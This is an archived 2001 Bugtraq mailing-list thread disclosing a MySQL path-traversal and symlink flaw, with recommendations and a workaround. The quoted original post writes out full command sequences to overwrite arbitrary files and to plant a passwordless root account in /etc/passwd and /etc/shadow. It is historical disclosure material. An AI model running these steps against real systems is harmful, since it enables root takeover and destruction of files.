Bugtraq mailing list archives
Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit)
From: JT <luser () AHAB COM>
Date: Wed, 21 Mar 2001 16:01:12 -0500
Yes, this does work with current mysql. I did manage to overwrite a file to which mysql daemon had permissions. When I tried using these strategies to overwrite a file to which mysqld didn't have permissions (~/etc/master.passwd), I ended up getting: ERROR 1: Can't create/write to file '/../tmp/fucked.MYD' (Errcode: 13) Which is another reason that running mysqld as root is like running a steeplechase with a loaded gun in your mouth. On Tue, Mar 20, 2001 at 12:02:58PM +1100, Scott Fagg wrote:
Works for mysql 3.23.32 running as root. I used: mysql -u root ../../../../tmp create table yikes(w int(4)); This created /tmp/yikes.*"Pavlov, Lesha" <lesha () NN RU> 19/3/01 4:32:37 am >>>Anybody, who get login and password to mysql can use it as DoS or r00t exploit because mysql accepts '../blah-blah' as valid database name and each table represented by 3 files tablename.ISD, tablename.ISM and tablename.frm, But, when mysqld checks table already exists or not exists, it checks _only_ tablename.frm : Usage this "vulnerable features of mysql" to make big DoS (Will Overwrite any file you wish): $ cd /var/tmp $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD $ mysql -u user -h localhost -p somepassword '../../tmp' create table qqq(www int); \q $ File /some/file/you/wish/to/overwrite will be overwritten. Usage as r00t exploit: $ cd /var/tmp $ ln -s /etc/passwd gotcha.ISD $ ln -s /etc/shadow make_me_r00t.ISD $ mysql -u user -h localhost -p somepassword '../../tmp' create table gotcha(qqq varchar(255)); create table make_me_r00t(qqq varchar(255)); insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n'); insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n'); \q $ You getta r00t now! Recomendations: * Patch mysql to when check table presents, it checks all tablename.{ISD,ISM,frm} files, not only tablename.frm * Patch mysql to treat database names, started by '..' as incorrect database names. * And Main recomendation - do not run mysqld as root!!! Patches: not yet Workaround: chowns existing database tables to a normal user and run mysqld as this unprivileged user - it will be better solution!. Vulnerable versions: This DoS/exploit tested on mysql-3.20.32a but i see another versions of mysql also vulnerabile. Comments: Mysql dox recomends dont run mysqld as root, but People from RedHat didnt read mysql dox - mysql istalled from rpm is vulnerable.
Current thread:
- Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit) Scott Fagg (Mar 20)
- Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit) Sergei Golubchik (Mar 21)
- Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit) JT (Mar 22)